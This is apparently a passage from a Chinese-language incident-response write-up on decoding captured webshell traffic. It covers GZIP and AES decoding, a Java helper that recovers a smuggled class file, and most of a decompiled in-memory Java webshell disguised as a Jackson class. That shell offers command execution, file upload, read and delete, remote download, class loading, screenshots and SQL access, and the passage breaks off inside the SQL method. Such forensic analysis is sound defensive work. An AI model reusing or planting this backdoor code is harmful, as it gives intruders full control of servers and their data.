2.1.7 GZIP编解码
内存马配合http头,改变了传输的加密格式
我们在传输过程中查看其解码后的数据,发现均以 1F8B08000000 开头:
1F8B0800000000000000CB4D2DC9C84FF14BCC4D65E2656060484F2D714A2CCE4C2EF6CC4BCB2F4E2D2ECECCCFF34C6112044A6546E6571519F8B8F85526A717A454394602006D9268393B000000 1F8B0800000000000000CB4D2DC9C84FF14BCC4D656261606028492D2E0100F839225013000000
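百度查询之后,发现这是GZIP压缩数据的文件头(1F8B 为GZIP魔数,08 表示deflate压缩方法)。为什么会出现GZIP压缩呢?根据之前的代码,传递的均为字节码;从后文反编译出的内存马也可以看到,请求数据先经 GZIPInputStream 解压再解析,返回结果则经 GZIPOutputStream 压缩后写出。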
我们加入GZIP解码,发现流量均迎刃而解
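26426ac13be6e1b58c69fd371bac6de05031411e180aefaba292f681d82e4080931feb534693d2267c5d1940e676a29e 解码后得到 6D6574686F644E616D65020400000074657374,即ASCII的 methodName、类型字节 02、4字节长度 04000000(小端,值为4)和值 test,与后文内存马 serialize/deserialize 中“键名 + 类型字节 + 4字节长度 + 值”的格式一致。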
我们可以在流量中发现奥秘,针对每个流量包进行分析,最终在一个比较大的流量包中,发现了正常的字节码,也就是攻击方导入的内存马
POST /ncupload/config.jsp HTTP/1.1 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Connection: close Content-Type: application/json Cache-Control: no-cache Pragma: no-cache Host: Content-Length: 47312 {"kvs":{"SaveLogResult":[0]},"tags":{"isSucc":true,"sdkVersion":"2.1.4","projectName":"Publish"},"extraData":""} HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Set-Cookie: JSESSIONID=66F5F21745E86D7D60B9253FABA7D17A.server; Path=/; HttpOnly Content-Type: text/xml;charset=UTF-8 Content-Length: 0 Date: Mon, 25 Jul 2022 11:16:17 GMT Connection: close
我们可以很明显地发现class文件的特征:数据以 CAFEBA 开头(Java class文件的魔数为 CAFEBABE)。
我们将字节码提取出来,并尝试用jd-gui打开,发现无法打开。咨询相关师傅后,判断可能是读取、解码过程中出了问题,于是用下面的代码从请求体的 extraData 字段重新提取并解密:
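import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;

/**
 * Offline triage helper: recovers the class file that was smuggled inside the
 * {@code extraData} field of a captured request body.
 *
 * <p>Pipeline: JSON body -> hex text in {@code extraData} -> raw bytes -> AES decrypt
 * -> {@code ./233.class}. The result is only written to disk for static analysis;
 * nothing in this tool loads or executes it.
 *
 * <p>The class lives in the default package so it can be compiled and run as a
 * single source file.
 */
public class Test {

    /** Base64 of the 16-byte AES key recovered for this captured session. */
    private static final String SESSION_KEY_B64 = "0J5YM0fKgYVrmMkwTUIF+Q==";

    /** JSON prefix that introduces the hex-encoded payload in the request body. */
    private static final String PAYLOAD_FIELD = "\"extraData\":\"";

    /** First four bytes of every valid Java class file. */
    private static final byte[] CLASS_MAGIC = {(byte) 0xCA, (byte) 0xFE, (byte) 0xBA, (byte) 0xBE};

    /**
     * Runs AES over {@code s} with the session key.
     *
     * @param s    input bytes (ciphertext when decrypting)
     * @param mode {@link Cipher#ENCRYPT_MODE} (1) or {@link Cipher#DECRYPT_MODE} (2)
     * @return the transformed bytes, or {@code null} if the operation failed; the
     *         cause is reported on stderr instead of being silently dropped
     */
    public static byte[] aes128(byte[] s, int mode) {
        try {
            // The original asked for plain "AES", which the stock SunJCE provider resolves
            // to this transformation; spelling it out removes the provider dependency.
            Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
            byte[] key = base64Decode(SESSION_KEY_B64.getBytes(StandardCharsets.US_ASCII));
            c.init(mode, new SecretKeySpec(key, "AES"));
            return c.doFinal(s);
        } catch (Exception e) {
            System.err.println("aes128 failed: " + e);
            return null;
        }
    }

    /**
     * Decodes standard Base64.
     *
     * @param bytes Base64 text as bytes
     * @return the decoded bytes, or {@code null} when the input is {@code null} or not valid Base64
     */
    public static byte[] base64Decode(byte[] bytes) {
        if (bytes == null) {
            return null;
        }
        try {
            return Base64.getDecoder().decode(bytes);
        } catch (IllegalArgumentException e) {
            return null;
        }
    }

    /**
     * Converts ASCII hex text into the bytes it represents.
     *
     * @param data hex digits, two per output byte
     * @return the decoded bytes
     * @throws IllegalArgumentException if the length is odd or a non-hex byte is present;
     *         a truncated or corrupted capture would otherwise decode into garbage
     */
    public static byte[] unHex(byte[] data) {
        if (data.length % 2 != 0) {
            throw new IllegalArgumentException("hex input has odd length " + data.length);
        }
        byte[] out = new byte[data.length / 2];
        for (int i = 0; i < out.length; i++) {
            int hi = Character.digit(data[2 * i], 16);
            int lo = Character.digit(data[2 * i + 1], 16);
            if (hi < 0 || lo < 0) {
                throw new IllegalArgumentException("non-hex byte at offset " + (2 * i));
            }
            out[i] = (byte) ((hi << 4) | lo);
        }
        return out;
    }

    /**
     * Encodes bytes as standard Base64 without line breaks.
     *
     * @param bytes raw bytes
     * @return Base64 text as bytes, or {@code null} when the input is {@code null}
     */
    public static byte[] base64Encode(byte[] bytes) {
        if (bytes == null) {
            return null;
        }
        return Base64.getEncoder().encode(bytes);
    }

    /** Returns the hex text stored in the {@code extraData} field of the request body. */
    private static byte[] extractPayloadHex(String body) {
        int start = body.indexOf(PAYLOAD_FIELD);
        if (start < 0) {
            throw new IllegalArgumentException("request body has no extraData field");
        }
        start += PAYLOAD_FIELD.length();
        int end = body.indexOf('"', start);
        if (end < 0) {
            throw new IllegalArgumentException("extraData value is not terminated");
        }
        return body.substring(start, end).getBytes(StandardCharsets.US_ASCII);
    }

    /** Checks whether {@code data} begins with the class-file magic number. */
    private static boolean looksLikeClassFile(byte[] data) {
        if (data.length < CLASS_MAGIC.length) {
            return false;
        }
        for (int i = 0; i < CLASS_MAGIC.length; i++) {
            if (data[i] != CLASS_MAGIC[i]) {
                return false;
            }
        }
        return true;
    }

    /**
     * Decrypts the payload of the request body embedded below and writes it to
     * {@code ./233.class}.
     *
     * @param args unused
     * @throws IOException if the output file cannot be written
     */
    public static void main(String[] args) throws IOException {
        // Captured request body; the hex payload from the capture goes in extraData.
        String b = "{\"kvs\":{\"SaveLogResult\":[0]},\"tags\":{\"isSucc\":true,\"sdkVersion\":\"2.1.4\",\"projectName\":\"Publish\"},\"extraData\":\"\"}";

        // Locate the field by name rather than by the fixed offsets 110/112, which only
        // hold for this exact JSON prefix.
        byte[] payloadHex = extractPayloadHex(b);
        if (payloadHex.length == 0) {
            System.err.println("extraData is empty: nothing to decrypt");
            return;
        }

        byte[] plain = aes128(unHex(payloadHex), Cipher.DECRYPT_MODE);
        if (plain == null) {
            System.err.println("decryption failed: check the key and that the capture is complete");
            return;
        }

        // A decompiler refusing the output usually means the extraction went wrong;
        // the magic number is the cheapest check for that.
        if (!looksLikeClassFile(plain)) {
            System.err.println("warning: output does not start with CAFEBABE; extraction or decoding is likely incomplete");
        }
        Files.write(Paths.get("./233.class"), plain);
    }
}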
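我们查看提取出的class内存马(以下为反编译结果)。可以看到该类伪装成 org.apache.coyote.introspect.JacksonAnnotationIntrospector,继承 ClassLoader 并公开 defineClass,用静态的 sessionMap 保存会话,并按请求中的 methodName 反射调用文件管理、命令执行、数据库操作、截屏等方法;排查时可据此核对已加载类中是否存在该类名及其来源: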
// // Source code recreated from a .class file by IntelliJ IDEA // (powered by FernFlower decompiler) // package org.apache.coyote.introspect; import java.awt.Rectangle; import java.awt.Robot; import java.awt.Toolkit; import java.awt.image.BufferedImage; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.PrintStream; import java.io.RandomAccessFile; import java.lang.reflect.Array; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.Method; import java.net.InetAddress; import java.net.URL; import java.sql.Connection; import java.sql.Driver; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.Statement; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Arrays; import java.util.Date; import java.util.Enumeration; import java.util.HashMap; import java.util.Hashtable; import java.util.Iterator; import java.util.List; import java.util.Map; import java.util.Properties; import java.util.Random; import java.util.zip.GZIPInputStream; import java.util.zip.GZIPOutputStream; import javax.imageio.ImageIO; public class JacksonAnnotationIntrospector extends ClassLoader { public static final char[] toBase64 = new char[]{'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/'}; private static Map sessionMap = new Hashtable(); Map parameterMap; byte[] requestData; ByteArrayOutputStream outputStream; Object servletRequest; Map session; public JacksonAnnotationIntrospector() { } public 
JacksonAnnotationIntrospector(ClassLoader var1) { super(var1); } public Class defineClass(byte[] var1) { return super.defineClass((String)null, var1, 0, var1.length, this.getClass().getProtectionDomain()); } public byte[] run() { try { String var1 = this.get("evalClassName"); String var20 = this.get("methodName"); if (var20 == null) { return "Method is empty".getBytes(); } else { Object var21 = null; if (var1 != null) { Class var4 = (Class)this.session.get(var1); if (var4 == null) { return "Plugin module not loaded".getBytes(); } this.parameterMap.put("sessionTable", this.session); this.parameterMap.put("servletRequest", this.servletRequest); var21 = var4.newInstance(); } Method var22 = null; boolean var5 = var21 != null; Class var6 = var5 ? var21.getClass() : this.getClass(); var21 = var5 ? var21 : this; byte[] var7 = this.getByteArray("invokeMethod"); Class[] var8 = new Class[1]; Object[] var9 = new Object[]{var21}; if (var7 != null || !var5) { Class var10002; try { var10002 = class$0; if (var10002 == null) { try { var10002 = Class.forName("java.util.Map"); } catch (ClassNotFoundException var17) { throw new NoClassDefFoundError(var17.getMessage()); } class$0 = var10002; } var8[0] = var10002; var22 = var6.getMethod(var20, var8); } catch (NoSuchMethodException var18) { try { var10002 = class$1; if (var10002 == null) { try { var10002 = Class.forName("java.util.Dictionary"); } catch (ClassNotFoundException var15) { throw new NoClassDefFoundError(var15.getMessage()); } class$1 = var10002; } var8[0] = var10002; var22 = var6.getMethod(var20, var8); } catch (NoSuchMethodException var16) { try { var8 = new Class[0]; var9 = new Object[0]; var22 = var6.getMethod(var20, var8); } catch (NoSuchMethodException var14) { return "No Such Method".getBytes(); } } } } Object var10 = null; if (var22 != null) { var10 = var22.invoke(var21, var9); } else { var21.equals(this.parameterMap); var21.toString(); var10 = this.parameterMap.get("result"); } Class var10000 = class$2; if (var10000 
== null) { try { var10000 = Class.forName("[B"); } catch (ClassNotFoundException var13) { throw new NoClassDefFoundError(var13.getMessage()); } class$2 = var10000; } if (var10000.isInstance(var10)) { return (byte[])var10; } else { var10000 = class$3; if (var10000 == null) { try { var10000 = Class.forName("java.lang.String"); } catch (ClassNotFoundException var12) { throw new NoClassDefFoundError(var12.getMessage()); } class$3 = var10000; } if (var10000.isInstance(var10)) { return ((String)var10).getBytes(); } else { var10000 = class$0; if (var10000 == null) { try { var10000 = Class.forName("java.util.Map"); } catch (ClassNotFoundException var11) { throw new NoClassDefFoundError(var11.getMessage()); } class$0 = var10000; } return var10000.isInstance(var10) ? this.serialize((Map)var10) : "Incorrect return type".getBytes(); } } } } catch (Throwable var19) { ByteArrayOutputStream var2 = new ByteArrayOutputStream(); PrintStream var3 = new PrintStream(var2); var19.printStackTrace(var3); var3.flush(); var3.close(); return var2.toByteArray(); } } public HashMap deserialize(byte[] var1, boolean var2) { HashMap var3 = new HashMap(); ByteArrayInputStream var4 = new ByteArrayInputStream(var1); ByteArrayOutputStream var5 = new ByteArrayOutputStream(); byte[] var6 = new byte[4]; try { Object var7 = var4; if (var2) { var7 = new GZIPInputStream(var4); } while(true) { byte var8 = (byte)((InputStream)var7).read(); if (var8 == -1) { break; } int var9; String var10; if (var8 == 1) { ((InputStream)var7).read(var6); var9 = bytesToInt(var6); var10 = var5.toString(); var3.put(var10, this.deserialize(this.readInputStream((InputStream)var7, var9), false)); var5.reset(); } else if (var8 == 2) { ((InputStream)var7).read(var6); var9 = bytesToInt(var6); var10 = var5.toString(); var3.put(var10, this.readInputStream((InputStream)var7, var9)); var5.reset(); } else { var5.write(var8); } } } catch (Exception var11) { } return var3; } public byte[] serialize(Map var1) { Iterator var2 = 
var1.keySet().iterator(); ByteArrayOutputStream var3 = new ByteArrayOutputStream(); while(var2.hasNext()) { try { String var4 = (String)var2.next(); Object var5 = var1.get(var4); var3.write(var4.getBytes()); byte[] var6; if (var5 instanceof byte[]) { var3.write(2); var6 = (byte[])var5; } else if (var5 instanceof Map) { var3.write(1); var6 = this.serialize((Map)var5); } else { var3.write(2); if (var5 == null) { var6 = "NULL".getBytes(); } else { var6 = var5.toString().getBytes(); } } var3.write(intToBytes(var6.length)); var3.write(var6); } catch (Exception var7) { } } return var3.toByteArray(); } public boolean equals(Object var1) { return var1 != null && this.handle(var1); } public boolean handle(Object var1) { if (var1 == null) { return false; } else { Class var10000 = class$4; if (var10000 == null) { try { var10000 = Class.forName("java.io.ByteArrayOutputStream"); } catch (ClassNotFoundException var3) { throw new NoClassDefFoundError(var3.getMessage()); } class$4 = var10000; } if (var10000.isInstance(var1)) { this.outputStream = (ByteArrayOutputStream)var1; } else { var10000 = class$2; if (var10000 == null) { try { var10000 = Class.forName("[B"); } catch (ClassNotFoundException var2) { throw new NoClassDefFoundError(var2.getMessage()); } class$2 = var10000; } if (var10000.isInstance(var1)) { this.requestData = (byte[])var1; } else if (this.supportClass(var1, ".servlet.http.HttpServletRequest")) { this.servletRequest = var1; } } return false; } } private boolean supportClass(Object var1, String var2) { if (var1 == null) { return false; } else { boolean var3 = false; Class var4 = null; try { try { var4 = Class.forName("javax" + var2, true, var1.getClass().getClassLoader()); } catch (Exception var5) { var4 = Class.forName("jakarta" + var2, true, var1.getClass().getClassLoader()); } } catch (Exception var6) { } if (var4 != null && var4.isInstance(var1)) { var3 = true; } return var3; } } public String toString() { if (this.outputStream != null && this.requestData != 
null) { try { this.parameterMap = this.deserialize(this.requestData, true); String var1 = this.sessionId(); if (var1 != null) { this.session = (Map)sessionMap.get(var1); } String var2 = this.get("methodName"); if (var2 == null || this.session == null && !"test".equals(var2)) { return super.toString(); } GZIPOutputStream var3 = new GZIPOutputStream(this.outputStream); byte[] var4 = this.run(); var3.write(var4); var3.close(); this.outputStream.close(); this.parameterMap = null; this.requestData = null; this.outputStream = null; this.servletRequest = null; this.session = null; } catch (Throwable var5) { } } return super.toString(); } public String get(String var1) { try { return new String((byte[])this.parameterMap.get(var1)); } catch (Exception var2) { return null; } } public byte[] getByteArray(String var1) { try { return (byte[])this.parameterMap.get(var1); } catch (Exception var2) { return null; } } public byte[] test() { HashMap var1 = new HashMap(); String var2 = this.sessionId(); if (this.session == null) { var2 = getRandomString(16); this.session = new Hashtable(); this.session.put("alive", Boolean.TRUE); sessionMap.put(var2, this.session); } var1.put("sessionId", var2); return this.serialize(var1); } public byte[] getFile() { String var1 = this.get("dirName"); HashMap var2 = new HashMap(); if (var1 != null) { var1 = var1.trim(); try { String var3 = (new File(var1)).getAbsoluteFile() + "/"; File var16 = new File(var3); if (var16.exists() && var16.isDirectory()) { File[] var5 = var16.listFiles(); if (var5 != null) { for(int var6 = 0; var6 < var5.length; ++var6) { HashMap var7 = new HashMap(); File var8 = var5[var6]; try { var7.put("0", var8.getName()); var7.put("1", var8.isDirectory() ? "0" : "1"); var7.put("2", (new SimpleDateFormat("yyyy-MM-dd HH:mm:ss")).format(new Date(var8.lastModified()))); var7.put("3", Long.toString(var8.length())); StringBuffer var9 = (new StringBuffer(String.valueOf(var8.canRead() ? "R" : ""))).append(var8.canWrite() ? 
"W" : ""); try { Class var10001 = class$5; if (var10001 == null) { try { var10001 = Class.forName("java.io.File"); } catch (ClassNotFoundException var12) { throw new NoClassDefFoundError(var12.getMessage()); } class$5 = var10001; } Method var10 = this.getMethodByClass(var10001, "canExecute", (Class[])null); if (var10 != null) { Boolean var11 = (Boolean)var10.invoke(var8); if (var11) { var9.append("X"); } } } catch (Throwable var13) { } String var17 = var9.toString(); var7.put("4", var17 != null && var17.trim().length() != 0 ? var17 : "F"); } catch (Throwable var14) { var7.put("errMsg", var14.getMessage()); } var2.put(String.valueOf(var6), var7); } var2.put("count", String.valueOf(var5.length)); var2.put("currentDir", var3); } } else { var2.put("errMsg", "dir does not exist"); } } catch (Exception var15) { StringBuffer var4 = new StringBuffer(); var4.append("Exception errMsg:"); var4.append(var15.getMessage()); var2.put("errMsg", var4.toString()); } } else { var2.put("errMsg", "No parameter dirName"); } return this.serialize(var2); } public String listFileRoot() { File[] var1 = File.listRoots(); String var2 = new String(); for(int var3 = 0; var3 < var1.length; ++var3) { var2 = var2 + var1[var3].getPath(); var2 = var2 + ";"; } return var2; } public byte[] fileRemoteDown() { String var1 = this.get("url"); String var2 = this.get("saveFile"); if (var1 != null && var2 != null) { FileOutputStream var3 = null; try { InputStream var4 = (new URL(var1)).openStream(); var3 = new FileOutputStream(var2); byte[] var9 = new byte[5120]; int var6; while((var6 = var4.read(var9)) != -1) { var3.write(var9, 0, var6); } var3.flush(); var3.close(); var4.close(); return "ok".getBytes(); } catch (Exception var8) { if (var3 != null) { try { var3.close(); } catch (IOException var7) { return var7.getMessage().getBytes(); } } StringBuffer var5 = new StringBuffer(); var5.append("Exception errMsg:"); var5.append(var8.getMessage()); return var5.toString().getBytes(); } } else { return "url or 
saveFile is null".getBytes(); } } public byte[] setFileAttr() { String var1 = this.get("type"); String var2 = this.get("attr"); String var3 = this.get("fileName"); String var4 = "Null"; if (var1 != null && var2 != null && var3 != null) { try { File var5 = new File(var3); if ("fileBasicAttr".equals(var1)) { Class var10001 = class$5; if (var10001 == null) { try { var10001 = Class.forName("java.io.File"); } catch (ClassNotFoundException var27) { throw new NoClassDefFoundError(var27.getMessage()); } class$5 = var10001; } if (this.getMethodByClass(var10001, "setWritable", new Class[]{Boolean.TYPE}) != null) { if (var2.indexOf("R") != -1) { var5.setReadable(true); } if (var2.indexOf("W") != -1) { var5.setWritable(true); } if (var2.indexOf("X") != -1) { var5.setExecutable(true); } var4 = "ok"; } else { var4 = "Java version is less than 1.6"; } } else if ("fileTimeAttr".equals(var1)) { Date var29 = new Date(0L); StringBuffer var7 = new StringBuffer(); var7.append(var2); char[] var8 = new char[13 - var7.length()]; Arrays.fill(var8, '0'); var7.append(var8); var29 = new Date(var29.getTime() + Long.parseLong(var7.toString())); var5.setLastModified(var29.getTime()); var4 = "ok"; try { Class var9 = Class.forName("java.nio.file.Paths"); Class var10 = Class.forName("java.nio.file.Path"); Class var11 = Class.forName("java.nio.file.attribute.BasicFileAttributeView"); Class var12 = Class.forName("java.nio.file.Files"); Class var13 = Class.forName("java.nio.file.attribute.FileTime"); Class var14 = Class.forName("[java.nio.file.LinkOption"); Class[] var10002 = new Class[2]; Class var10005 = class$3; if (var10005 == null) { try { var10005 = Class.forName("java.lang.String"); } catch (ClassNotFoundException var25) { throw new NoClassDefFoundError(var25.getMessage()); } class$3 = var10005; } var10002[0] = var10005; var10005 = class$6; if (var10005 == null) { try { var10005 = Class.forName("[Ljava.lang.String;"); } catch (ClassNotFoundException var24) { throw new 
NoClassDefFoundError(var24.getMessage()); } class$6 = var10005; } var10002[1] = var10005; Method var15 = var9.getMethod("get", var10002); Method var16 = var13.getMethod("fromMillis", Long.TYPE); var10002 = new Class[]{var10, null, null}; var10005 = class$7; if (var10005 == null) { try { var10005 = Class.forName("java.lang.Class"); } catch (ClassNotFoundException var23) { throw new NoClassDefFoundError(var23.getMessage()); } class$7 = var10005; } var10002[1] = var10005; var10002[2] = var14; Method var17 = var12.getMethod("getFileAttributeView", var10002); Method var18 = var11.getMethod("setTimes", var13, var13, var13); Object var19 = var15.invoke((Object)null, var3, new String[0]); Object var20 = Array.newInstance(var14.getComponentType(), 0); Object var21 = var17.invoke((Object)null, var19, var11, var20); Object var22 = var16.invoke((Object)null, var29.getTime()); var18.invoke(var21, var22, var22, var22); } catch (Throwable var26) { } } else { var4 = "no ExcuteType"; } } catch (Throwable var28) { StringBuffer var6 = new StringBuffer(); var6.append("Exception errMsg:"); var6.append(var28.getMessage()); return var6.toString().getBytes(); } } else { var4 = "type or attr or fileName is empty"; } return var4.getBytes(); } public byte[] readFile() { String var1 = this.get("fileName"); if (var1 != null) { File var2 = new File(var1); try { if (var2.exists() && var2.isFile()) { if (var2.length() > 204800L) { return "The file is too large, please use the large file to download".getBytes(); } else { byte[] var3 = new byte[(int)var2.length()]; FileInputStream var4; if (var3.length > 0) { var4 = new FileInputStream(var2); var3 = this.readInputStream(var4, var3.length); var4.close(); } else { var3 = new byte[204800]; var4 = new FileInputStream(var2); int var5 = var4.read(var3); if (var5 > 0) { var3 = new byte[var5]; System.arraycopy(var3, 0, var3, 0, var3.length); } var4.close(); } return var3; } } else { return "file does not exist".getBytes(); } } catch (Exception var6) { 
return var6.getMessage().getBytes(); } } else { return "No parameter fileName".getBytes(); } } public byte[] uploadFile() { String var1 = this.get("fileName"); byte[] var2 = this.getByteArray("fileValue"); if (var1 != null && var2 != null) { try { File var3 = new File(var1); var3.createNewFile(); FileOutputStream var4 = new FileOutputStream(var3); var4.write(var2); var4.close(); return "ok".getBytes(); } catch (Exception var5) { return var5.getMessage().getBytes(); } } else { return "No parameter fileName and fileValue".getBytes(); } } public byte[] newFile() { String var1 = this.get("fileName"); if (var1 != null) { File var2 = new File(var1); try { return var2.createNewFile() ? "ok".getBytes() : "fail".getBytes(); } catch (Exception var5) { StringBuffer var4 = new StringBuffer(); var4.append("Exception errMsg:"); var4.append(var5.getMessage()); return var4.toString().getBytes(); } } else { return "No parameter fileName".getBytes(); } } public byte[] newDir() { String var1 = this.get("dirName"); if (var1 != null) { File var2 = new File(var1); try { return var2.mkdirs() ? 
"ok".getBytes() : "fail".getBytes(); } catch (Exception var5) { StringBuffer var4 = new StringBuffer(); var4.append("Exception errMsg:"); var4.append(var5.getMessage()); return var4.toString().getBytes(); } } else { return "No parameter fileName".getBytes(); } } public byte[] deleteFile() { String var1 = this.get("fileName"); String var2 = "mem://"; if (var1 != null) { if (var1.startsWith(var2)) { this.session.remove(var1); return "ok".getBytes(); } else { try { File var3 = new File(var1); this.deleteFiles(var3); return "ok".getBytes(); } catch (Exception var5) { StringBuffer var4 = new StringBuffer(); var4.append("Exception errMsg:"); var4.append(var5.getMessage()); return var4.toString().getBytes(); } } } else { return "No parameter fileName".getBytes(); } } public byte[] moveFile() { String var1 = this.get("srcFileName"); String var2 = this.get("destFileName"); if (var1 != null && var2 != null) { File var3 = new File(var1); try { if (var3.exists()) { return var3.renameTo(new File(var2)) ? 
"ok".getBytes() : "fail".getBytes(); } else { return "The target does not exist".getBytes(); } } catch (Exception var6) { StringBuffer var5 = new StringBuffer(); var5.append("Exception errMsg:"); var5.append(var6.getMessage()); return var5.toString().getBytes(); } } else { return "No parameter srcFileName,destFileName".getBytes(); } } public byte[] copyFile() { String var1 = this.get("srcFileName"); String var2 = this.get("destFileName"); if (var1 != null && var2 != null) { File var3 = new File(var1); File var4 = new File(var2); try { if (var3.exists() && var3.isFile()) { FileInputStream var5 = new FileInputStream(var3); FileOutputStream var6 = new FileOutputStream(var4); byte[] var7 = new byte[5120]; int var8; while((var8 = var5.read(var7)) > -1) { var6.write(var7, 0, var8); } var5.close(); var6.close(); return "ok".getBytes(); } else { return "The target does not exist or is not a file".getBytes(); } } catch (Exception var9) { return var9.getMessage().getBytes(); } } else { return "No parameter srcFileName,destFileName".getBytes(); } } public byte[] include() { byte[] var1 = this.getByteArray("binCode"); String var2 = this.get("codeName"); if (var1 != null && var2 != null) { try { JacksonAnnotationIntrospector var3 = new JacksonAnnotationIntrospector(this.getClass().getClassLoader()); Class var4 = var3.defineClass(var1); this.session.put(var2, var4); return "ok".getBytes(); } catch (Exception var5) { return this.session.get(var2) != null ? 
"ok".getBytes() : var5.getMessage().getBytes(); } } else { return "No parameter binCode,codeName".getBytes(); } } public byte[] execCommand() { String var1 = this.get("argsCount"); if (var1 != null && var1.length() > 0) { int var2 = Integer.parseInt(var1); String[] var3 = new String[var2]; for(int var4 = 0; var4 < var3.length; ++var4) { var3[var4] = this.get("arg-" + var4); } try { Process var11 = Runtime.getRuntime().exec(var3); if (var11 == null) { return "Unable to start process".getBytes(); } else { InputStream var12 = var11.getInputStream(); InputStream var6 = var11.getErrorStream(); ByteArrayOutputStream var7 = new ByteArrayOutputStream(1024); byte[] var8 = new byte[1042]; int var9; if (var12 != null) { while((var9 = var12.read(var8)) > 0) { var7.write(var8, 0, var9); } } if (var6 != null) { while((var9 = var6.read(var8)) > 0) { var7.write(var8, 0, var9); } } return var7.toByteArray(); } } catch (Exception var10) { StringBuffer var5 = new StringBuffer(); var5.append("Exception errMsg:"); var5.append(var10.getMessage()); return var5.toString().getBytes(); } } else { return "No parameter argsCount".getBytes(); } } public byte[] getBasicsInfo() { String var1 = ""; try { Enumeration var2 = System.getProperties().keys(); var1 = var1 + "FileRoot : " + this.listFileRoot() + "\n"; var1 = var1 + "CurrentDir : " + (new File("")).getAbsoluteFile() + "/" + "\n"; var1 = var1 + "CurrentUser : " + System.getProperty("user.name") + "\n"; var1 = var1 + "ProcessArch : " + System.getProperty("sun.arch.data.model") + "\n"; String var9; try { var9 = System.getProperty("java.io.tmpdir"); char var4 = var9.charAt(var9.length() - 1); if (var4 != '\\' && var4 != '/') { var9 = var9 + File.separator; } var1 = var1 + "TempDirectory : " + var9 + "\n"; } catch (Exception var7) { } var1 = var1 + "RealFile : " + this.getRealPath() + "\n"; try { var1 = var1 + "OsInfo : os.name: " + System.getProperty("os.name") + " os.version: " + System.getProperty("os.version") + " os.arch: " + 
System.getProperty("os.arch") + "\n"; } catch (Exception var6) { var1 = var1 + "OsInfo : " + var6.getMessage() + "\n"; } for(var1 = var1 + "IPList : " + getLocalIPList() + "\n"; var2.hasMoreElements(); var1 = var1 + var9 + " : " + System.getProperty(var9) + "\n") { var9 = (String)var2.nextElement(); } Map var11 = this.getEnv(); String var10; if (var11 != null) { for(Iterator var5 = var11.keySet().iterator(); var5.hasNext(); var1 = var1 + var10 + " : " + var11.get(var10) + "\n") { var10 = (String)var5.next(); } } return var1.getBytes(); } catch (Exception var8) { StringBuffer var3 = new StringBuffer(); var3.append(var1); var3.append("Exception errMsg:"); var3.append(var8.getMessage()); return var3.toString().getBytes(); } } public byte[] screen() { try { Robot var1 = new Robot(); BufferedImage var6 = var1.createScreenCapture(new Rectangle(Toolkit.getDefaultToolkit().getScreenSize().width, Toolkit.getDefaultToolkit().getScreenSize().height)); ByteArrayOutputStream var3 = new ByteArrayOutputStream(); ImageIO.write(var6, "png", ImageIO.createImageOutputStream(var3)); byte[] var4 = var3.toByteArray(); var3.close(); return var4; } catch (Throwable var5) { StringBuffer var2 = new StringBuffer(); var2.append("Exception errMsg:"); var2.append(var5.getMessage()); return var2.toString().getBytes(); } } public byte[] execSql() throws Exception { String var1 = this.get("dbCharset"); String var2 = this.get("jdbcURL"); String var3 = this.get("dbDriver"); String var4 = this.get("dbUsername"); String var5 = this.get("dbPassword"); String var6 = this.get("execType"); if (var1 == null || var1.trim().length() > 0) { var1 = "UTF-8"; } String var7 = new String(this.getByteArray("execSql"), var1); HashMap var8 = new HashMap(); if (var4 != null && var5 != null && var6 != null && var7 != null) { try { try { if (var3 != null) { Class.forName(var3); } } catch (Throwable var30) { } try { Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver"); } catch (Throwable var29) { } try { 
Class.forName("oracle.jdbc.driver.OracleDriver"); } catch (Throwable var28) { try { Class.forName("oracle.jdbc.OracleDriver"); } catch (Throwable var27) { } } try { Class.forName("com.mysql.cj.jdbc.Driver"); } catch (Throwable var26) { try { Class.forName("com.mysql.jdbc.Driver"); } catch (Throwable var25) { } } try { Class.forName("org.postgresql.Driver"); } catch (Throwable var24) { } if (var2 != null) { try { Connection var9 = null; try { var9 = getConnection(var2, var4, var5); } catch (Exception var23) { } if (var9 == null) { var9 = DriverManager.getConnection(var2, var4, var5); } Statement var10 = var9.createStatement(); if (var6.equals("select")) { ResultSet var11 = var10.executeQuery(var7); ResultSetMetaData var12 = var11.getMetaData(); int var13 = var12.getColumnCount(); HashMap var14 = new HashMap(); for(int var15 = 0; var15 < var13; ++var15) { var14.put(String.valueOf(var15), var12.getColumnName(var15 + 1)); } var14.put("count", String.valueOf(var13)); var8.put("column", var14); HashMap var34 = new HashMap(); int var16 = 0; for(int var17 = 0; var11.next(); ++var17) { HashMap var18 = new HashMap(); for(int var19 = 0; var19 < var13; ++var19) { Object var20 = var11.getObject(var19 + 1); String var21 = null; if (var20 == null) { var21 = "NULL"; } else { Class var10000 = class$2; if (var10000 == null) { try { var10000 = Class.forName("[B"); } catch (ClassNotFoundException var22) { throw new NoClassDefFoundError(var22.getMessage()); } class$2 = var10000; } if (var10000.isInstance(var20)) { var21 = this.base64Encode((byte[])var20); } else { var21 = var20.toString(); } } var18.put(String.valueOf(var19), var21); } ++var16; var34.put(String.valueOf(var17), var18); } var34.put("count", String.valueOf(var16)); var8.put("rows", var34); var11.close(); var10.close(); var9.close(); } else { 